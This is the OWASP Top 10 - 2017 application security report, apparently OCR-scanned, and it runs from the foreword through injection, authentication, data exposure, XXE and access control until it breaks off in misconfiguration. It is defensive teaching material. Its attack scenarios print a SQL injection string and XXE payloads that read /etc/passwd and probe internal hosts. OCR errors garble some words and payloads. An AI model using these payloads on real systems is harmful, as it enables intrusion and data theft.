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The Open Web Application Security Project (OWASP) is an 
open community dedicated to enabling organizations to 
develop, purchase, and maintain applications and APIs that 
can be trusted. 

At OWASP, you'll find free and open: 

• Application security tools and standards. 

• Complete books on application security testing, secure 
code development, and secure code review. 

• Presentations and videos . 

• Cheat sheets on many common topics. 

• Standard security controls and libraries. 

• Local chapters worldwide . 

• Cutting edge research. 

• Extensive conferences worldwide . 

• Mailing lists . 

Learn more at: https://www.owasp.ora . 

All OWASP tools, documents, videos, presentations, and 
chapters are free and open to anyone interested in improving 
application security. 

We advocate approaching application security as a people, 
process, and technology problem, because the most 
effective approaches to application security require 
improvements in these areas. 

OWASP is a new kind of organization. Our freedom from 
commercial pressures allows us to provide unbiased, 
practical, and cost-effective information about application 
security. 

OWASP is not affiliated with any technology company, 
although we support the informed use of commercial security 
technology. OWASP produces many types of materials in a 
collaborative, transparent, and open way. 

The OWASP Foundation is the non-profit entity that ensures 
the project's long-term success. Almost everyone associated 
with OWASP is a volunteer, including the OWASP board, 
chapter leaders, project leaders, and project members. 

We support innovative security research with grants and 
infrastructure. 

Come join us! 
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Copyright © 2003 - 2017 The OWASP Foundation 

This document is released under the Creative Commons Attribution Share-Alike 4.0 license. 
For any reuse or distribution, you must make it clear to others the license terms of this work. 
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Foreword 


Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software 
becomes increasingly complex, and connected, the difficulty of achieving application security increases exponentially. The 
rapid pace of modern software development processes makes the most common risks essential to discover and resolve 
quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this 
OWASP Top 10. 

A great deal of feedback was received during the creation of the OWASP Top 10 - 2017, more than for any other equivalent 
OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for 
OWASP to get the Top 10 right for the majority of use cases. 

Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers and managers, 
it has become the de facto application security standard. 

In this release, issues and recommendations are written concisely and in a testable way to assist with the adoption of the 
OWASP Top 10 in application security programs. We encourage large and high performing organizations to use the OWASP 
Application Security Verification Standard (ASVS) if a true standard is required, but for most, the OWASP Top 10 is a great 
start on the application security journey. 

We have written up a range of suggested next steps for different users of the OWASP Top 10, including What’s Next for 
Developers . What’s Next for Security Testers . What’s Next for Organizations , which is suitable for CIOs and CISOs, and 
What’s Next for Application Managers , which is suitable for application managers or anyone responsible for the lifecycle of 
the application. 

In the long term, we encourage all software development teams and organizations to create an application security program 
that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your 
organization's existing strengths to measure and improve your application security program using the Software Assurance 
Maturity Model . 

We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with 
your questions, comments, and ideas at our GitHub project repository: 

• https://github.com/OWASP/Top1Q/issues 

You can find the OWASP Top 10 project and translations here: 

• https://www.owasp.org/index.php/top10 

Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams, for all their 
efforts, and believing in us to get this finished with the community's help. Thank you! 

• Andrew van der Stock 

• Brian Glas 

• Neil Smithline 

• Torsten Gigler 
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Introduction 


Welcome to the OWASP Top 10 - 2017! 


This major update adds several new issues, including two issues selected by the community - A8:2017-lnsecure 

Deserialization and A10:2017-Insufficient Logging and Monitoring . Two key differentiators from previous OWASP Top 10 
releases are the substantial community feedback and extensive data assembled from dozens of organizations, possibly the 
largest amount of data ever assembled in the preparation of an application security standard. This provides us with 
confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing 
organizations. 

The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and 
an industry survey that was completed by over 500 individuals. This data spans vulnerabilities gathered from hundreds of 
organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to 
this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact. 

A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the 
consequences of the most common and most important web application security weaknesses. The Top 10 provides basic 
techniques to protect against these high risk problem areas, and provides guidance on where to go from here. 


Roadmap for future activities 

Don't stop at 10. There are hundreds of issues that could 
affect the overall security of a web application as discussed 

in the OWASP Developer's Guide and the OWASP Cheat 
Sheet Series . These are essential reading for anyone 
developing web applications and APIs. Guidance on how to 
effectively find vulnerabilities in web applications and APIs 
is provided in the OWASP Testing Guide . 

Constant change. The OWASP Top 10 will continue to 
change. Even without changing a single line of your 
application's code, you may become vulnerable as new 
flaws are discovered and attack methods are refined. 
Please review the advice at the end of the Top 10 in What's 
Next For Developers . Security Testers . Organizations , and 
Application Managers for more information. 

Think positive. When you're ready to stop chasing 
vulnerabilities and focus on establishing strong application 
security controls, the OWASP Proactive Controls project 
provides a starting point to help developers build security 
into their application and the OWASP Application Security 
Verification Standard fASVSI is a guide for organizations 
and application reviewers on what to verify. 

Use tools wisely. Security vulnerabilities can be quite 
complex and deeply buried in code. In many cases, the 
most cost-effective approach for finding and eliminating 
these weaknesses is human experts armed with advanced 
tools. Relying on tools alone provides a false sense of 
security and is not recommended. 

Push left, right, and everywhere. Focus on making 
security an integral part of your culture throughout your 
development organization. Find out more in the OWASP 

Software Assurance Maturity Model (SAMM1 . 
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more than 40 responses to the call for data. For the first 
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made. We wish to give heartfelt thanks to these 
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additional comments, notes of encouragement, 
and criticisms were all appreciated. We know your time is 
valuable and we wanted to say thanks. 

We would like to thank those individuals who have 
contributed significant constructive comments and time 
reviewing this update to the Top 10. As much as possible, 
we have listed them on the ‘ Acknowledgements ’ page. 

And finally, we'd like to thank in advance all the translators 
out there who will translate this release of the Top 10 into 
numerous different languages, helping to make the OWASP 
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Release Notes 


□ 


What changed from 2013 to 2017? 


Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the 

OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re¬ 
written each risk from the ground up, and added references to frameworks and languages that are now commonly used. 

Over the last few years, the fundamental technology and architecture of applications has changed significantly: 

• Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices come with their 
own security challenges including establishing trust between microservices, containers, secret management, etc. Old code never 
expected to be accessible from the Internet is now sitting behind an API or RESTful web service to be consumed by Single Page 
Applications (SPAs) and mobile applications. Architectural assumptions by the code, such as trusted callers, are no longer valid. 

• Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular 
feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges. 

• JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as 

Bootstrap, Electron, Angular, and React running on the client. 

New issues, supported by data: 

• A4:2017-XML External Entities (XXE) is a new cateaorv primarilv supported bv source code analvsis securitv testina tools 
(SAST) data sets. 

New issues, supported by the community: 

We asked the community to provide insight into two forward looking weakness categories. After over 500 peer submissions, and 

removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are: 

• A8:2017-lnsecure Deserialization, which permits remote code execution or sensitive object manipulation on affected platforms. 

• A10:2017-Insufficient Loaaina and Monitoring the lack of which can prevent or sianificantlv delav malicious activitv and breach 
detection, incident response, and digital forensics. 

Merged or retired, but not forgotten: 

• A4-lnsecure Direct Object References and A7-Missina Function Level Access Control meraed into A5:2017-Broken Access 
Control. 

• A8-Cross-Site Reauest Foraerv (CSRF), as manv frameworks include CSRF defenses, it was found in onlv 5% of applications. 

• AlO-Unvalidated Redirects and Forwards, while found in approximately 8% of applications, it was edged out overall by XXE. 

OWASP Top 10 - 2013 

* 

OWASP Top 10 - 2017 

A1 - Injection 

* 

A1:2017-lnjection 

A2 - Broken Authentication and Session Management 

* 

A2:2017-Broken Authentication 

A3 - Cross-Site Scripting (XSS) 


A3:2017-Sensitive Data Exposure 

A4 - Insecure Direct Object References [Merged+A7] 


U 

A4:2017-XML External Entities (XXE) [NEW] 

A5 - Security Misconfiguration 



A5:2017-Broken Access Control [Merged] 

A6 - Sensitive Data Exposure 


7S 

A6:2017-Security Misconfiguration 

A7 - Missing Function Level Access Contr [Merged+A4 

q 

U 

A7:2017-Cross-Site Scripting (XSS) 

A8 - Cross-Site Request Forgery (CSRF) 

0 

A8:2017-lnsecure Deserialization [NEW, Community] 

A9 - Using Components with Known Vulnerabilities 

* 

A9:2017-Using Components with Known Vulnerabilities 

A10 - Unvalidated Redirects and Forwards 

0 

A10:2017-Insufficient Logging&Monitoring [NEW,Comm.] 






































Application Security Risks 
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Risk 


What Are Application Security Risks? 


Attackers can potentially use many different paths through your application to do harm to your business or organization. Each 
of these paths represents a risk that may, or may not, be serious enough to warrant attention. 


Threat Attack 

Agents Vectors 


Security 

Weaknesses 


Security 

Controls 


Technical 

Impacts 


Business 

Impacts 


■ ■ Attack 



Attack 


Weakness# Control > ■ 


Weakness# r«#Control# >■! 


Weakness 




Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. Similarly, the harm that is 
caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can 
evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an 
estimate of the technical and business impact to your organization. Together, these factors determine your overall risk. 


What's My Risk? 

The OWASP Top 10 focuses on identifying the most serious web application 
security risks for a broad array of organizations. For each of these risks, we 
provide generic information about likelihood and technical impact using the 
following simple ratings scheme, which is based on the OWASP Risk Rating 

Methodology . 


Threat 

Agents 

Exploitability 

Weakness 

Prevalence 

Weakness 

Detectability 

Technical 

Impacts 

Business 

Impacts 

Appli¬ 

cation 

Specific 

Easy: 3 

Widespread: 3 

Easy: 3 

Severe: 3 

Business 

Specific 

Average: 2 

Common: 2 

Average: 2 

Moderate: 2 

Difficult: 1 

Uncommon: 1 

Difficult: 1 

Minor: 1 


In this edition, we have updated the risk rating system to assist in calculating the 
likelihood and impact of any given risk. For more details, please see Note About 
Risks . 

Each organization is unique, and so are the threat actors for that organization, 
their goals, and the impact of any breach. If a public interest organization uses a 
content management system (CMS) for public information and a health system 
uses that same exact CMS for sensitive health records, the threat actors and 
business impacts can be very different for the same software. It is critical to 
understand the risk to your organization based on applicable threat agents and 
business impacts. 

Where possible, the names of the risks in the Top 10 are aligned with Common 
Weakness Enumeration (CWE) weaknesses to promote generally accepted 
naming conventions and to reduce confusion. 


References 

OWASP 

• OWASP Risk Rating Methodology 
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• ISO 31000: Risk Management Std 

• ISO 27001: ISMS 

• NIST Cvber Framework (US) 

• ASP Strategic Mitigations (AU) 

• NIST CVSS 3.0 

• Microsoft Threat Modelling Tool 
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A1:2017- 

Injection 

\ _ 


Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent 
to an interpreter as part of a command or query. The attacker’s hostile data can trick the 
interpreter into executing unintended commands or accessing data without proper authorization. 




































A1 

:2017 


Injection 
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Threat < 

Agents +• 1111 



Impacts 


App. Specific 


Exploitability: 3 

Prevalence: 2 

Detectability: 3 

Technical: 3 


Business ? 


Almost any source of data can be an 
injection vector, environment 
variables, parameters, external and 
internal web services, and all types of 
users. Injection flaws occur when an 
attacker can send hostile data to an 
interpreter. 


Injection flaws are very prevalent, particularly in 
legacy code. Injection vulnerabilities are often found 
in SQL, LDAP, XPath, or NoSQL queries, OS 
commands, XML parsers, SMTP headers, 
expression languages, and ORM queries. 

Injection flaws are easy to discover when examining 
code. Scanners and fuzzers can help attackers find 
injection flaws. 


Injection can result in data loss, 
corruption, or disclosure to 
unauthorized parties, loss of 
accountability, or denial of access. 
Injection can sometimes lead to 
complete host takeover. 

The business impact depends on the 
needs of the application and data. 


Is the Application Vulnerable? 

An application is vulnerable to attack when: 

• User-supplied data is not validated, filtered, or sanitized by the 
application. 

• Dynamic queries or non-parameterized calls without context- 
aware escaping are used directly in the interpreter. 

• Hostile data is used within object-relational mapping (ORM) 
search parameters to extract additional, sensitive records. 

• Hostile data is directly used or concatenated, such that the 
SQL or command contains both structure and hostile data in 
dynamic queries, commands, or stored procedures. 

Some of the more common injections are SQL, NoSQL, OS 
command, Object Relational Mapping (ORM), LDAP, and 
Expression Language (EL) or Object Graph Navigation Library 
(OGNL) injection. The concept is identical among all interpreters. 
Source code review is the best method of detecting if 
applications are vulnerable to injections, closely followed by 
thorough automated testing of all parameters, headers, URL, 
cookies, JSON, SOAP, and XML data inputs. Organizations can 
include static source ( SAST ) and dynamic application test 
( PAST) tools into the Cl/CD pipeline to identify newly introduced 
injection flaws prior to production deployment. 


Example Attack Scenarios 

Scenario #1 : An application uses untrusted data in the 
construction of the following vulnerable SQL call: 

String query = "SELECT * FROM accounts WHERE 
custlD='" + request.getParameter("id") +.; 

Scenario #2: Similarly, an application’s blind trust in frameworks 
may result in queries that are still vulnerable, (e.g. Hibernate 
Query Language (HQL)): 

Query HQLQuery = session.createQuery("FROM accounts 
WHERE custlD='" + request.getParameter("id") +.); 

In both cases, the attacker modifies the ‘id’ parameter value in 
their browser to send: ' or T='1 . For example: 

http://example.com/app/accountView7ids' or T='1 

This changes the meaning of both queries to return all the 
records from the accounts table. More dangerous attacks could 
modify or delete data, or even invoke stored procedures. 


How to Prevent 

Preventing injection requires keeping data separate from 

commands and queries. 

• The preferred option is to use a safe API, which avoids the use 
of the interpreter entirely or provides a parameterized interface, 
or migrate to use Object Relational Mapping Tools (ORMs). 
Note: Even when parameterized, stored procedures can still 
introduce SQL injection if PL/SQL or T-SQL concatenates 
queries and data, or executes hostile data with EXECUTE 
IMMEDIATE or exec(). 

• Use positive or "whitelist" server-side input validation. This is 
not a complete defense as many applications require special 
characters, such as text areas or APIs for mobile applications. 

• For any residual dynamic queries, escape special characters 
using the specific escape syntax for that interpreter. 

Note: SQL structure such as table names, column names, and 
so on cannot be escaped, and thus user-supplied structure 
names are dangerous. This is a common issue in report-writing 
software. 

• Use LIMIT and other SQL controls within queries to prevent 
mass disclosure of records in case of SQL injection. 


References 

OWASP 

• OWASP Proactive Controls: Parameterize Queries 

• OWASP ASVS: V5 Input Validation and Encoding 

• OWASP Testing Guide: SQL Injection , Command Injection , 
ORM injection 

• OWASP Cheat Sheet: Injection Prevention 

• OWASP Cheat Sheet: SQL Injection Prevention 

• OWASP Cheat Sheet: Injection Prevention in Java 

• OWASP Cheat Sheet: Query Parameterization 

• OWASP Automated Threats to Web Applications - QAT-014 

External 

• CWE-77: Command Injection 

• CWE-89: SQL Injection 

• CWE-564: Hibernate Injection 

• CWE-917: Expression Language Injection 

• PortSwiqqer: Server-side template injection 
























































Broken Authentication 
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:2017 



Threat Q 
Agents ■ ■ ■ 


App. Specific 


# Attack 


-K Security 

Vectors 


Weakness 


Impacts 


Exploitability: 3 

Prevalence: 2 

Detectability: 2 

Technical: 3 


Business ? 


Attackers have access to hundreds of 
millions of valid username and 
password combinations for credential 
stuffing, default administrative 
account lists, automated brute force, 
and dictionary attack tools. Session 
management attacks are well 
understood, particularly in relation to 
unexpired session tokens. 


The prevalence of broken authentication is 
widespread due to the design and implementation of 
most identity and access controls. Session manage¬ 
ment is the bedrock of authentication and access 
controls, and is present in all stateful applications. 

Attackers can detect broken authentication using 
manual means and exploit them using automated 
tools with password lists and dictionary attacks. 


Attackers have to gain access to only 
a few accounts, or just one admin 
account to compromise the system. 
Depending on the domain of the 
application, this may allow money 
laundering, social security fraud, and 
identity theft, or disclose legally 
protected highly sensitive information. 


Is the Application Vulnerable? 

Confirmation of the user's identity, authentication, and session 

management are critical to protect against authentication-related 

attacks. 

There may be authentication weaknesses if the application: 

• Permits automated attacks such as credential stuffing , where 
the attacker has a list of valid usernames and passwords. 

• Permits brute force or other automated attacks. 

• Permits default, weak, or well-known passwords, such as 
"Passwordl" or "admin/admin“. 

• Uses weak or ineffective credential recovery and forgot- 
password processes, such as "knowledge-based answers", 
which cannot be made safe. 

• Uses plain text, encrypted, or weakly hashed passwords (see 
A3:2017-Sensitive Data Exposure ). 

• Has missing or ineffective multi-factor authentication. 

• Exposes Session IDs in the URL (e.g., URL rewriting). 

• Does not rotate Session IDs after successful login. 

• Does not properly invalidate Session IDs. User sessions or 
authentication tokens (particularly single sign-on (SSO) tokens) 
aren’t properly invalidated during logout or a period of inactivity. 


Example Attack Scenarios 

Scenario #1: Credential stuffing , the use of lists of known 

passwords , is a common attack. If an application does not 
implement automated threat or credential stuffing protections, the 
application can be used as a password oracle to determine if the 
credentials are valid. 

Scenario #2: Most authentication attacks occur due to the 
continued use of passwords as a sole factor. Once considered 
best practices, password rotation and complexity requirements 
are viewed as encouraging users to use, and reuse, weak 
passwords. Organizations are recommended to stop these 
practices per NIST 800-63 and use multi-factor authentication. 

Scenario #3: Application session timeouts aren’t set properly. A 
user uses a public computer to access an application. Instead of 
selecting “logout” the user simply closes the browser tab and 
walks away. An attacker uses the same browser an hour later, 
and the user is still authenticated. 


How to Prevent 

• Where possible, implement multi-factor authentication to 
prevent automated, credential stuffing, brute force, and stolen 
credential re-use attacks. 

• Do not ship or deploy with any default credentials, particularly 
for admin users. 

• Implement weak-password checks, such as testing new or 
changed passwords against a list of the top 10000 worst 

passwords . 

• Align password length, complexity and rotation policies with 

NIST 800-63 B's guidelines in section 5.1.1 for Memorized 

Secrets or other modern, evidence based password policies. 

• Ensure registration, credential recovery, and API pathways are 
hardened against account enumeration attacks by using the 
same messages for all outcomes. 

• Limit or increasingly delay failed login attempts. Log all failures 
and alert administrators when credential stuffing, brute force, or 
other attacks are detected. 

• Use a server-side, secure, built-in session manager that 
generates a new random session ID with high entropy after 
login. Session IDs should not be in the URL, be securely stored 
and invalidated after logout, idle, and absolute timeouts 


References 
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• OWASP Proactive Controls: Implement Identity and 

Authentication Controls 

• OWASP ASVS: V2 Authentication , V3 Session Management 
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Sensitive Data Exposure 
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App. Specific 


# Attack 


-K Security 

Vectors 


Weakness 


Impacts 


Exploitability: 2 

Prevalence: 3 

Detectability: 2 

Technical: 3 


Business ? 


Rather than directly attacking crypto, 
attackers steal keys, execute man-in- 
the-middle attacks, or steal clear text 
data off the server, while in transit, or 
from the user’s client, e.g. browser. A 
manual attack is generally required. 
Previously retrieved password 
databases could be brute forced by 
Graphics Processing Units (GPUs). 


Over the last few years, this has been the most 
common impactful attack. The most common flaw is 
simply not encrypting sensitive data. When crypto is 
employed, weak key generation and management, 
and weak algorithm, protocol and cipher usage is 
common, particularly for weak password hashing 
storage techniques. For data in transit, server side 
weaknesses are mainly easy to detect, but hard for 
data at rest. 


Failure frequently compromises all 
data that should have been protected. 
Typically, this information includes 
sensitive personal information (Pll) 
data such as health records, creden¬ 
tials, personal data, and credit cards, 
which often require protection as 
defined by laws or regulations such as 
the EU GDPR or local privacy laws. 


Is the Application Vulnerable? 

The first thing is to determine the protection needs of data in 
transit and at rest. For example, passwords, credit card numbers, 
health records, personal information and business secrets 
require extra protection, particularly if that data falls under 
privacy laws, e.g. EU's General Data Protection Regulation 
(GDPR), or regulations, e.g. financial data protection such as 
PCI Data Security Standard (PCI DSS). For all such data: 

• Is any data transmitted in clear text? This concerns protocols 
such as HTTP, SMTP, and FTP. External internet traffic is 
especially dangerous. Verify all internal traffic e.g. between 
load balancers, web servers, or back-end systems. 

• Is sensitive data stored in cleartext, including backups? 

• Are any old or weak cryptographic algorithms used either by 
default or in older code? 

• Are default crypto keys in use, weak crypto keys generated or 
re-used, or is proper key management or rotation missing? 

• Is encryption not enforced, e.g. are any user agent (browser) 
security directives or headers missing? 

• Does the user agent (e.g. app, mail client) not verify if the 
received server certificate is valid? 

See ASVS Crypto (V7T Data Prot (V9) and SSL/TLS (VI0) 


Example Attack Scenarios 

Scenario #1 : An application encrypts credit card numbers in a 
database using automatic database encryption. However, this 
data is automatically decrypted when retrieved, allowing an SQL 
injection flaw to retrieve credit card numbers in clear text. 

Scenario #2: A site doesn't use or enforce TLS for all pages or 
supports weak encryption. An attacker monitors network traffic 
(e.g. at an insecure wireless network), downgrades connections 
from HTTPS to HTTP, intercepts requests, and steals the user's 
session cookie. The attacker then replays this cookie and hijacks 
the user's (authenticated) session, accessing or modifying the 
user's private data. Instead of the above they could alter all 
transported data, e.g. the recipient of a money transfer. 

Scenario #3: The password database uses unsalted or simple 
hashes to store everyone's passwords. A file upload flaw allows 
an attacker to retrieve the password database. All the unsalted 
hashes can be exposed with a rainbow table of pre-calculated 
hashes. Hashes generated by simple or fast hash functions may 
be cracked by GPUs, even if they were salted. 


How to Prevent 

Do the following, at a minimum, and consult the references: 

• Classify data processed, stored, or transmitted by an 
application. Identify which data is sensitive according to privacy 
laws, regulatory requirements, or business needs. 

• Apply controls as per the classification. 

• Don’t store sensitive data unnecessarily. Discard it as soon as 
possible or use PCI DSS compliant tokenization or even 
truncation. Data that is not retained cannot be stolen. 

• Make sure to encrypt all sensitive data at rest. 

• Ensure up-to-date and strong standard algorithms, protocols, 
and keys are in place; use proper key management. 

• Encrypt all data in transit with secure protocols such as TLS 
with perfect forward secrecy (PFS) ciphers, cipher prioritization 
by the server, and secure parameters. Enforce encryption 
using directives like HTTP Strict Transport Security ( HSTS ). 

• Disable caching for responses that contain sensitive data. 

• Store passwords using strong adaptive and salted hashing 
functions with a work factor (delay factor), such as Argon2, 
scrypt, bcrypt, or PBKDF2 . 

• Verify independently the effectiveness of configuration and 
settings. 

References 

OWASP 

• OWASP Proactive Controls: Protect Data 

• OWASP Application Security Verification Standard (V7,9,10) 

• OWASP Cheat Sheet: Transport Laver Protection 

• OWASP Cheat Sheet: User Privacy Protection 

• OWASP Cheat Sheets: Password and Cryptographic Storage 

• OWASP Security Headers Project : Cheat Sheet: HSTS 

• OWASP Testing Guide: Testing for weak cryptography 

External 

• CWE-220: Exposure of sens, information through data gueries 

• CWE-310: Cryptographic Issues : CWE-311: Missing Encryption 

• CWE-312: Cleartext Storage of Sensitive Information 

• CWE-319: Cleartext Transmission of Sensitive Information 

• CWE-326: Weak Encryption ; CWE-327: Broken/Risky Crypto 

• CWE-359: Exposure of Private Information (Privacy Violation) 
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Exploitability: 
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Attackers can exploit vulnerable XML 
processors if they can upload XML or 
include hostile content in an XML 
document, exploiting vulnerable code, 
dependencies or integrations. 



Impacts 


Prevalence: 2 


Detectability: 3 


Technical: 3 


Business ? 


By default, many older XML processors allow 
specification of an external entity, a URI that is 
dereferenced and evaluated during XML processing. 

SAST tools can discover this issue by inspecting 
dependencies and configuration. PAST tools require 
additional manual steps to detect and exploit this 
issue. Manual testers need to be trained in how to 
test for XXE, as it not commonly tested as of 2017. 


These flaws can be used to extract 
data, execute a remote request from 
the server, scan internal systems, 
perform a denial-of-service attack, as 
well as execute other attacks. 

The business impact depends on the 
protection needs of all affected 
application and data. 


Is the Application Vulnerable? 

Applications and in particular XML-based web services or 

downstream integrations might be vulnerable to attack if: 

• The application accepts XML directly or XML uploads, 
especially from untrusted sources, or inserts untrusted data into 
XML documents, which is then parsed by an XML processor. 

• Any of the XML processors in the application or SOAP based 
web services has document type definitions (DTDs) enabled. 

As the exact mechanism for disabling DTD processing varies 
by processor, it is good practice to consult a reference such as 

the OWASP Cheat Sheet 'XXE Prevention’ . 

• If your application uses SAML for identity processing within 
federated security or single sign on (SSO) purposes. SAML 
uses XML for identity assertions, and may be vulnerable. 

• If the application uses SOAP prior to version 1.2, it is likely 
susceptible to XXE attacks if XML entities are being passed to 
the SOAP framework. 

• Being vulnerable to XXE attacks likely means that the 
application is vulnerable to denial of service attacks including 
the Billion Laughs attack. 


Example Attack Scenarios 

Numerous public XXE issues have been discovered, including 
attacking embedded devices. XXE occurs in a lot of unexpected 
places, including deeply nested dependencies. The easiest way 
is to upload a malicious XML file, if accepted: 

Scenario #1 : The attacker attempts to extract data from the 
server: 

<?xml version="1.0" encoding="ISO-8859-1"?> 
dDOCTYPE foo [ 

<!ELEMENT foo ANY > 

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<foo>&xxe;</foo> 

Scenario #2: An attacker probes the server's private network by 
changing the above ENTITY line to: 

<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> 

Scenario #3: An attacker attempts a denial-of-service attack by 
including a potentially endless file: 

<!ENTITY xxe SYSTEM "file:///dev/random" >]> 


How to Prevent 

Developer training is essential to identify and mitigate XXE. 

Besides that, preventing XXE requires: 

• Whenever possible, use less complex data formats such as 
JSON, and avoiding serialization of sensitive data. 

• Patch or upgrade all XML processors and libraries in use by 
the application or on the underlying operating system. Use 
dependency checkers. Update SOAP to SOAP 1.2 or higher. 

• Disable XML external entity and DTD processing in all XML 
parsers in the application, as per the OWASP Cheat Sheet 
'XXE Prevention' . 

• Implement positive ("whitelisting") server-side input validation, 
filtering, or sanitization to prevent hostile data within XML 
documents, headers, or nodes. 

• Verify that XML or XSL file upload functionality validates 
incoming XML using XSD validation or similar. 

• SAST tools can help detect XXE in source code, although 
manual code review is the best alternative in large, complex 
applications with many integrations. 

If these controls are not possible, consider using virtual 

patching, API security gateways, or Web Application Firewalls 

(WAFs) to detect, monitor, and block XXE attacks. 


References 

OWASP 

• OWASP Application Security Verification Standard 

• OWASP Testing Guide: Testing for XML Injection 

• OWASP XXE Vulnerability 

• OWASP Cheat Sheet: XXE Prevention 

• OWASP Cheat Sheet: XML Security 

External 

• CWE-611: Improper Restriction of XXE 

• Billion Laughs Attack 

• SAML Security XML External Entity Attack 

• Detecting and exploiting XXE in SAML Interfaces 
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Exploitation of access control is a 
core skill of attackers. SAST and 
PAST tools can detect the absence of 
access control but cannot verify if it is 
functional when it is present. Access 
control is detectable using manual 
means, or possibly through 
automation for the absence of access 
controls in certain frameworks. 




Security 

Weakness 


• Impacts 


Prevalence: 2 


Detectability: 2 


Technical: 3 


Business ? 


Access control weaknesses are common due to the 
lack of automated detection, and lack of effective 
functional testing by application developers. 

Access control detection is not typically amenable to 
automated static or dynamic testing. Manual testing 
is the best way to detect missing or ineffective 
access control, including HTTP method (GET vs 
PUT, etc), controller, direct object references, etc. 


The technical impact is attackers 
acting as users or administrators, or 
users using privileged functions, or 
creating, accessing, updating or 
deleting every record. 

The business impact depends on the 
protection needs of the application 
and data. 


Is the Application Vulnerable? 

Access control enforces policy such that users cannot act 
outside of their intended permissions. Failures typically lead to 
unauthorized information disclosure, modification or destruction 
of all data, or performing a business function outside of the limits 
of the user. Common access control vulnerabilities include: 

• Bypassing access control checks by modifying the URL, 
internal application state, or the HTML page, or simply using a 
custom API attack tool. 

• Allowing the primary key to be changed to another users 
record, permitting viewing or editing someone else's account. 

• Elevation of privilege. Acting as a user without being logged in, 
or acting as an admin when logged in as a user. 

• Metadata manipulation, such as replaying or tampering with a 
JSON Web Token (JWT) access control token or a cookie or 
hidden field manipulated to elevate privileges, or abusing JWT 
invalidation 

• CORS misconfiguration allows unauthorized API access. 

• Force browsing to authenticated pages as an unauthenticated 
user or to privileged pages as a standard user. Accessing API 
with missing access controls for POST, PUT and DELETE. 


Example Attack Scenarios 

Scenario #1 : The application uses unverified data in a SQL call 
that is accessing account information: 

pstmt.setString( 1 , request.getParameter("acct")); 

ResultSet results = pstmt.executeQuery(); 

An attacker simply modifies the 'acct' parameter in the browser to 
send whatever account number they want. If not properly 
verified, the attacker can access any user's account. 

http://example.com/app/accountlnfo7acctsnotmyacct 

Scenario #2: An attacker simply force browses to target URLs. 
Admin rights are required for access to the admin page. 

http://example.com/app/getapplnfo 

http://example.com/app/admin_getapplnfo 

If an unauthenticated user can access either page, it’s a flaw. If a 
non-admin can access the admin page, this is a flaw. 


How to Prevent 

Access control is only effective if enforced in trusted server-side 

code or server-less API, where the attacker cannot modify the 

access control check or metadata. 

• With the exception of public resources, deny by default. 

• Implement access control mechanisms once and re-use them 
throughout the application, including minimizing CORS usage. 

• Model access controls should enforce record ownership, rather 
than accepting that the user can create, read, update, or delete 
any record. 

• Unique application business limit requirements should be 
enforced by domain models. 

• Disable web server directory listing and ensure file metadata 
(e.g. .git) and backup files are not present within web roots. 

• Log access control failures, alert admins when appropriate 
(e.g. repeated failures). 

• Rate limit API and controller access to minimize the harm from 
automated attack tooling. 

• JWT tokens should be invalidated on the server after logout. 

Developers and QA staff should include functional access control 

unit and integration tests. 


References 

OWASP 

• OWASP Proactive Controls: Access Controls 

• OWASP Application Security Verification Standard: V4 Access 

Control 

• OWASP Testing Guide: Authorization Testing 

• OWASP Cheat Sheet: Access Control 

External 

• CWE-22: Improper Limitation of a Pathname to a Restricted 

Directory ('Path Traversal') 

• CWE-284: Improper Access Control (Authorization) 

• CWE-285: Improper Authorization 

• CWE-639: Authorization Bypass Through User-Controlled Key 

• PortSwiqqer: Exploiting CORS Misconfiguration 
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# Attack 


-K Security 

Vectors 


Weakness 


Impacts 


Exploitability: 3 

Prevalence: 3 

Detectability: 3 

Technical: 2 


Business ? 


Attackers will often attempt to exploit 
unpatched flaws or access default 
accounts, unused pages, unprotected 
files and directories, etc to gain 
unauthorized access or knowledge of 
the system. 


Security misconfiguration can happen at any level of 
an application stack, including the network services, 
platform, web server, application server, database, 
frameworks, custom code, and pre-installed virtual 
machines, containers, or storage. Automated 
scanners are useful for detecting misconfigurations, 
use of default accounts or configurations, 
unnecessary services, legacy options, etc. 


Such flaws frequently give attackers 
unauthorized access to some system 
data or functionality. Occasionally, 
such flaws result in a complete 
system compromise. 

The business impact depends on the 
protection needs of the application 
and data. 


Is the Application Vulnerable? 

The application might be vulnerable if the application is: 

• Missing appropriate security hardening across any part of the 
application stack, or improperly configured permissions on 
cloud services. 

• Unnecessary features are enabled or installed (e.g. 
unnecessary ports, services, pages, accounts, or privileges). 

• Default accounts and their passwords still enabled and 
unchanged. 

• Error handling reveals stack traces or other overly informative 
error messages to users. 

• For upgraded systems, latest security features are disabled or 
not configured securely. 

• The security settings in the application servers, application 
frameworks (e.g. Struts, Spring, ASP.NET), libraries, 
databases, etc. not set to secure values. 

• The server does not send security headers or directives or they 
are not set to secure values. 

• The software is out of date or vulnerable (see A9:2017-Usinq 
Components with Known Vulnerabilities ). 

Without a concerted, repeatable application security 

configuration process, systems are at a higher risk. 


Example Attack Scenarios 

Scenario #1 : The application server comes with sample 
